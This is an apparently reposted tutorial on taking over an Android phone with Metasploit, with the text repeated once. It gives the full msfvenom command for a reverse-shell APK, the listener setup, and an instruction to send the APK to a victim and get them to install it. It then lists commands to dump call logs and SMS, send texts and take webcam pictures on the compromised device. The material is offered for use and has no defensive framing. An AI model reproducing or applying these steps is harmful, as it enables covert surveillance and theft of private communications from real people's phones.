fbarraza28
Cloud Security Specialist
LEVEL 1
300 XP
In this article, we will learn how to hack an android device and exploit it according to one’s desires. Android is an operating system based onLinuxkernel. It usesan APKfile format to install any application. Hence, our malware will also be in APK format. To construct the malware use the following msfvenom command :
As the msfvenom malware is created, start the handler in order to have a session and for this type :
Once the exploit is executed, send the APK file to the victim and make sure to run the file in their android phone. As the said file will run, you will havea sessionas shown in the image below :
Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :
You can check whether the device is rooted or not by using the following command :
You can also dump all the call-logs by usingthe followingcommand ;
The above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents :
cat <text file name>
You can also send any kind of SMS from the device, remotely, with the following command :
You can even use the following command to capture a picture :
It will save the pictureintoa JPEG file.
Similar to dumping the call logs, you can also dump all the SMSs will the following command :
And then you can read theSMSdump file using cat command as shown in the image below :
This way, you can exploit android as the way you like it.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here
Code:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apkAs the msfvenom malware is created, start the handler in order to have a session and for this type :
Code:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploitOnce the exploit is executed, send the APK file to the victim and make sure to run the file in their android phone. As the said file will run, you will havea sessionas shown in the image below :
Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :
You can check whether the device is rooted or not by using the following command :
Code:
check_rootYou can also dump all the call-logs by usingthe followingcommand ;
Code:
dump_calllogThe above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents :
cat <text file name>
You can also send any kind of SMS from the device, remotely, with the following command :
Code:
send_sms -d 95******** -t hackedYou can even use the following command to capture a picture :
Code:
webcam_snapIt will save the pictureintoa JPEG file.
Similar to dumping the call logs, you can also dump all the SMSs will the following command :
Code:
dump_smsAnd then you can read theSMSdump file using cat command as shown in the image below :
This way, you can exploit android as the way you like it.
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here